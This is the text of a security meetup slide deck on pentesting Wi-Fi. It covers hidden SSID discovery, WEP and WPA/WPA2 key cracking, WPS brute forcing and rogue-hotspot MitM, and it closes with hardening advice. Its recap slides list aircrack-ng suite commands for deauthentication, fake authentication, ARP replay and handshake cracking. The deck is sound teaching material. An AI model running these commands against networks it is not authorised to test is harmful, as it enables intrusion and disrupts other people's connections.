pentesting wireless networks and wireless network security

Ayoma Wijethunga WSO2, Platform Security Team

[ayomawdb]

Pentesting Wireless Networks and

Wireless Network Security

http://www.meetup.com/Colombo-White-Hat-Security/

https://www.facebook.com/colombowhitehat

https://twitter.com/ColomboWhiteHat

Ayoma Wijethunga

api android arduino automation building developing

discusses diy electronics engineering iot jaggery java kali linux modular osgi prusa reprap

security software ublox web wireshark wso2o Software Engineer at WSO2, Platform Security Team.o Get in touch

o Email : ayoma@wso2.como LinkedIn : https://lk.linkedin.com/in/ayoma o Blog : http://ayomaonline.com o Twitter / Facebook / Github / Hangout : ayomawdb

Real Agenda

● Hidden SSID [Demo]

● WEP & Relevant Attacks [Demo]

● WPA / WSP2 & Relevant Attacks [Demo]

● WPS Attacks [Demo]

● Securing Personal WLAN

● Securing Enterprise WLAN

● Avoid untrusted wireless networks (why?) [Demo]

● Looking into Future

● What more to expect from White Hat Security

Hidden

Networks?

Hidden SSID / Network Cloaking

“WhiteHat_WiFi” network is available ...(beacon frame)

“WhiteHat_WiFi” network is available ...(beacon frame)

Beacon Frame - Timestamp, Interval, SSID, Capability, Rates, Parameter Sethttp://www.wi-fiplanet.com/tutorials/article.php/1492071/80211-Beacons-Revealed.htm

Beacon frame with NULL SSID

Beacon frame with NULL SSID Looking for

“WhiteHat_WiFi”(Probe request)

NO

RM

AL

CLO

AK

ED

Hidden SSID / Network Cloaking

Hidden SSID / Network Cloaking

Demo Time

Discovering Hidden SSIDs

Image Source: Spy vs. Spy

airmon-ng

Monitor Mode

& Managed Mode

airodump-ngDump Traffic

aireplay-ngDeauth Attack

Recap of Network Cloaking Demo

Enable monitor mode:

sudo airmon-ng start wlan0

Scan all networks:

sudo airodump-ng wlan0mon

Scan specific network:

sudo airodump-ng --bssid <BSSID> -c <Channel> wlan0mon

De-authenticate a client to capture probe request:

sudo aireplay-ng --deauth <Count> -a <AP_MAC> -c <Client_MAC> wlan0mon

Hidden SSID / Network Cloaking

Hey! I’m “WhiteHat_WiFi” with 80% signal strength. (Probe response)

Beacon frame with NULL SSID

Looking for “WhiteHat_WiFi”(Probe request)

Hey! I’m “WhiteHat_WiFi” with 100% signal strength. (Probe response)

Karma attack - http://theta44.org/karma/

WEP

WEP Introduction

64 bit RC4 Key

40 bit Key 24 bit Initialization Vector

128 bit RC4 Key

104 bit Key (13 ASCII characters) 24 bit Initialization Vector

Enc(K, Clear Text Challenge)

Auth Request

Clear Text Challenge

Success

WEP Internals

In WEP Context:

Encryption: M(A) = [ A.CRC32(A) ] ⊕ RC4(v, k)

Decryption: [ A.CRC32(A) ] = M(A) ⊕ RC4(v, k)

Very Basic Idea Behind Stream Cipher Attack:

E(A) = A ⊕ K

E(B) = B ⊕ K

E(A) ⊕ E(B) = (A ⊕ K) ⊕ (B ⊕ K) = A ⊕ B ⊕ K ⊕ K = A ⊕ B

Therefore, need to avoid key reuse.

24 bit IV (v) is too short to avoid collisions.http://dl.aircrack-ng.org/wiki-files/doc/aircrack_reverse_engineer.pdf

WEP Attacks

Demo Time

WEP Attacks

Image Source: Spy vs. Spy

airmon-ng

Monitor Mode

airodump-ng

Dump Traffic

aireplay-ngReplay Packets

aircrack-ngCrack Passwords

Recap of WEP Attacks DemoEnable monitor mode:

sudo airmon-ng start wlan0

Scan all networks:

sudo airodump-ng wlan0mon

Scan specific network:

sudo airodump-ng --bssid <BSSID> -c <Channel> --write <DumpFileName> wlan0mon

Fake authenticate with hotspot:

sudo aireplay-ng --fakeauth <KA_Delay> -a <AP_MAC> -h <Source_MAC> wlan0mon

ARP Replay: (can use Chopchop / Fragmentation / Caffe Latte as well)

sudo aireplay-ng --arpreplay -b <AP_MAC> -h <Source_MAC> wlan0mon

Crack WEP:

sudo aircrack-ng <DumpFileName>

WEP Attacks● Methods used by Aircrack-ng

○ PTW Method (Pychkine, Tews, Weinmann) - 35,000 packets to reach 50%

○ FMS/Korek Method

● Methods available via Aireplay-ng○ FakeAuth Attack and Deauth Attack

○ ArpReplay Attack

○ Chopchop Attack

○ Fragmentation Attack

○ Caffe Latte Attack

References

https://www.aircrack-ng.org/doku.php?id=links#technique_papers

http://www.item.ntnu.no/_media/people/personalpages/phd/anton/kleins_and_ptw_attacks_on_wep.pdf

https://matthieu.io/dl/wifi-attacks-wep-wpa.pdf

https://people.rit.edu/cwh4129/Vulnerabilities_in_WEP_Slides.pdf

WPA / WPA2

What is new with WPA / WPA2?

● WPA / WPA2○ Rotation of keys

■ New 256 bit key for each packet

○ Larger key size (8 to 63 ASCII characters)

○ Sequence counter to avoid replay attacks

○ Initial handshake required in order to deliver the first group keys

○ Extensible Authentication Protocol (EAP)

○ 64-bit Message Integrity Check (MIC) - Michael

● WPA - TKIP / CCMP (Temporal Key Integrity Protocol)

○ Uses RC4 stream cipher

● WPA2 - AES CCMP (Cipher Block Chaining Message Authentication Code Protocol)

○ Uses AES block encryption

WPA / WPA2 Fourway Handshake

http://www.practicallynetworked.com/security/041207wpa_psk.htm

WPA / WPA2 Fourway Handshake

http://www.practicallynetworked.com/security/041207wpa_psk.htm

WPA / WPA2 Attacks

Demo Time

WPA / WPA2 Attacks

Image Source: Spy vs. Spy

airmon-ng

Monitor Mode

airodump-ng

Dump Traffic

aireplay-ngReplay Packets

aircrack-ngCrack Passwords

hashcatGPU Cracking

crunchWordlist Generator

Recap of WPA / WPA2 Attacks Demo

Hashcat (GPU) https://hashcat.net/wiki/doku.php?id=cracking_wpawpa2 Crunch - https://sourceforge.net/projects/crunch-wordlist/

Enable monitor mode:

sudo airmon-ng start wlan0

Scan all networks:

sudo airodump-ng wlan0mon

Scan specific network:

sudo airodump-ng --bssid <BSSID> -c <Channel> --write <DumpFileName> wlan0mon

DeAuth Attack (to capture fourway handshake)

sudo aireplay-ng --deauth 2 -a <AP_MAC> -c <Client_MAC> wlan0mon

Crack WPA Handshake with Wordlist:

sudo aircrack-ng -w <password_list> <DumpFileName>

Crack WPA Handshake with airolib-ng:

aircrack-ng -r <precomputed_password_db> <DumpFileName>

Security Research with GPUs

5GHs Bitcoin Mining Rig - https://www.youtube.com/watch?v=2nDTBN_cPs0

MegaBigPower https://megabigpower.com/aboutus

Please note that images are not relevant to examples of GPU used in hacking, but resembles usage of GPU in fastening cryptographic functions (which can be used in hacking / security research)

WPA / WPA2 Attacks - Practical Difficulties

Cracking cost is exponential to

password complexity

Permanent tables cannot be

generated since SSID is

used as a salt

(PBKDF2)

Image : http://brilliancesecuritymagazine.com/by-staff-reporter/active-cyber-defense-or-hacking-back/

WPS

WPS Attacks

Image: http://www.techpanorma.com/wi-fi-protected-setup-wps-how-to-connect-devices-wi-fi-router/

WPS Attacks

Demo Time

WPA / WPA2 Attacks

Image Source: Spy vs. Spy

wash

Looking for WPS

enabled networks reaverWPS BruteforcingPixie Dust

WPS Attacks - Practical Difficulties

New routers enforce usage

counts (WPS lock after X

attempts)

Security community / media

strongly advise disabling

WPS

Image : http://brilliancesecuritymagazine.com/by-staff-reporter/active-cyber-defense-or-hacking-back/

Security

Securing WLAN

● Use WPA2 - AES CCMP (Personal or Enterprise mode).

● Disable WPS.

● Test if your router really disable WPS.

● Use lengthy and complex WiFi passwords (symbols/numbers/caps).

● Use unique SSID (change the default)

● Make sure router admin panel is protected with a different password.

● Use guest accounts for “guests”.

● Avoid dictionary words in passwords.

Securing Enterprise WLAN

● Use WPA2 - AES CCMP (Enterprise mode).

● Disable WPS.

● Test if your router really disable WPS.

● Use guest accounts for “guests”.

● Maintain separate network segments for different purposes

○ Internal connections / General connections / Guest connections / BYOD connections

● RADIUS server for authentication.

● Per-user sessions and per-session random key.

● MAC validation (can be spoofed).

CloudCracker (Dead)

604 million-word dictionary - $17

1.2 billion-word dictionary - $34

GPU based cracking as

a SaaS?Backdoor in AES?

https://www.schneier.com/blog/archives/2012/03/can_the_nsa_bre.html

Looking into Future

Image : http://www.keyword-suggestions.com/c3BlZWQgaWNvbg/

Avoid untrusted wireless networks (why?)

Demo Time

AP Gone Bad

OpenWRT

Create FREE WiFi

Hotspot

SSLSplitSplit SSL connections&perform MitM

Image Source: Spy vs. Spy

What more to expect from

about Wireless Security

Bluetooth (BLE) Security

Ultra-portable Wireless Security Recipes with ESP8266

RF

BE WITHIN LEGAL LIMITS

Only test your own networks, or test with proper authorization.

Thank you!